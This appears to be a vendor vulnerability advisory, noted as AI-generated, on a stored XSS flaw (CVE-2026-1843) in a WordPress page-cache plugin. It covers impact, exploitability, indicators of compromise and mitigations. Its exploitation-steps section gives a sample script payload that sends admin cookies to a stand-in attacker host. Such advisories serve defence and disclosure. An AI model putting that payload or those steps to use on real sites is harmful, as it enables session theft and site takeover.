CVE-2026-1843: 
WordPress vulnerability analysis and mitigation

Overview

CVE-2026-1843 is a Stored Cross-Site Scripting (XSS) vulnerability in the Super Page Cache plugin for WordPress, developed by Optimole. The flaw exists in the plugin's Activity Log feature and affects all versions up to and including 5.2.2. Unauthenticated attackers can inject arbitrary web scripts that execute whenever a user visits an affected page. It carries a CVSS v3.1 base score of 7.2 (High) and was published on February 14, 2026 (Red Hat CVE, Wordfence).

Technical details

The root cause is insufficient input sanitization and output escaping in the Activity Log component of the Super Page Cache plugin, classified as CWE-79 (Improper Neutralization of Input During Web Page Generation). Because the plugin fails to sanitize data written to the activity log and does not escape it on output, an unauthenticated remote attacker can craft a malicious HTTP request that causes arbitrary JavaScript to be stored in the log. The injected script then executes in the browser of any authenticated user (including administrators) who views the Activity Log page, with no user interaction required beyond visiting the page (Red Hat CVE, Infinitsec).

Impact

Successful exploitation allows an unauthenticated attacker to execute arbitrary JavaScript in the context of any user who views the Activity Log, including site administrators. This can lead to session token theft, credential harvesting, unauthorized administrative actions (such as creating rogue admin accounts or installing malicious plugins), and full site takeover. The CVSS scope is marked as Changed, reflecting that the impact extends beyond the plugin itself to the broader WordPress environment and its users (Red Hat CVE).

Exploitability

No public exploit code or active in-the-wild exploitation has been reported for CVE-2026-1843 at this time. The vulnerability requires no authentication and no user interaction to inject the payload, though a victim must view the Activity Log page for the script to execute. The EPSS score is approximately 0.074% (0.000740), indicating a currently low probability of exploitation in the wild. It has not been added to the CISA Known Exploited Vulnerabilities (KEV) catalog (Red Hat CVE, Wordfence).

Exploitation steps

  1. Reconnaissance: Identify WordPress sites running the Super Page Cache (by Optimole) plugin version 5.2.2 or earlier using tools like WPScan, Shodan, or manual inspection of plugin directories.
  2. Craft malicious request: As an unauthenticated user, send an HTTP request to the target WordPress site that triggers an activity log entry — for example, by performing an action (such as a failed login or page request) that the plugin records in its Activity Log.
  3. Inject XSS payload: Include a malicious JavaScript payload (e.g., <script>document.location='https://attacker.com/steal?c='+document.cookie</script>) in a field that is logged by the Activity Log without sanitization, such as a user-agent header, referrer, or other logged parameter.
  4. Wait for victim interaction: The injected script is stored in the Activity Log. When an administrator or privileged user navigates to the Activity Log page in the WordPress dashboard, the script executes in their browser.
  5. Achieve objective: The executed script can steal session cookies, perform actions on behalf of the admin (e.g., create a backdoor account, install a malicious plugin), or redirect the victim to an attacker-controlled site (Infinitsec, Red Hat CVE).

Indicators of compromise

  • Network: Unusual outbound requests from the WordPress server or admin browser to unknown external domains shortly after an administrator views the Activity Log; HTTP requests containing encoded JavaScript (<script>, %3Cscript%3E, javascript:) in user-agent or referrer headers directed at the WordPress site.
  • Logs: WordPress or web server access logs showing requests with suspicious payloads in headers (User-Agent, Referer) from unauthenticated sources; entries in the Super Page Cache Activity Log containing HTML or JavaScript tags.
  • File System: Unexpected new WordPress admin accounts or newly installed/activated plugins not authorized by site administrators.
  • Process/Behavior: Admin browser sessions performing unexpected actions (plugin installs, user creation) that correlate with Activity Log access events.

Mitigation and workarounds

Users should update the Super Page Cache plugin to a version above 5.2.2, which addresses the insufficient input sanitization and output escaping in the Activity Log. Until an update is applied, administrators should restrict access to the WordPress admin dashboard (including the Activity Log) to trusted IP addresses using server-level controls (e.g., .htaccess or firewall rules). Disabling or removing the plugin entirely is an option if the functionality is not critical. Deploying a Web Application Firewall (WAF) with XSS filtering rules can provide an additional layer of defense (Wordfence, Red Hat CVE).

Community reactions

Wordfence included CVE-2026-1843 in its weekly WordPress vulnerability report for the period of February 9–15, 2026, highlighting it as a notable unauthenticated stored XSS issue (Wordfence). Red Hat also tracked the vulnerability in its security advisory database (Red Hat CVE). No significant broader media coverage or notable researcher commentary beyond standard vulnerability disclosure channels has been identified.

Additional resources


Source: This report was generated using AI

Related WordPress vulnerabilities:

CVE ID

Severity

Score

Technologies

Component name

CISA KEV exploit

Has fix

Published date

CVE-2026-86850MEDIUM6.5
  • sku-error-fixer-for-woocommerce
NoNoOct 06, 2026
CVE-2026-88931MEDIUM5.3
  • social-web-suite
NoNoOct 06, 2026
CVE-2026-87841MEDIUM5.3
  • unitechpay-paiements-mobile-money
NoNoOct 06, 2026
CVE-2026-92990MEDIUM5.3
  • sendpress
NoNoOct 06, 2026
CVE-2026-92989MEDIUM4.3
  • sendpress
NoNoOct 06, 2026

Free Vulnerability Assessment

Benchmark your Cloud Security Posture

Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.

Request assessment

Get a personalized demo

Ready to see Wiz in action?

"Best User Experience I have ever seen, provides full visibility to cloud workloads."
David EstlickCISO
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
Adam FletcherChief Security Officer
"We know that if Wiz identifies something as critical, it actually is."
Greg PoniatowskiHead of Threat and Vulnerability Management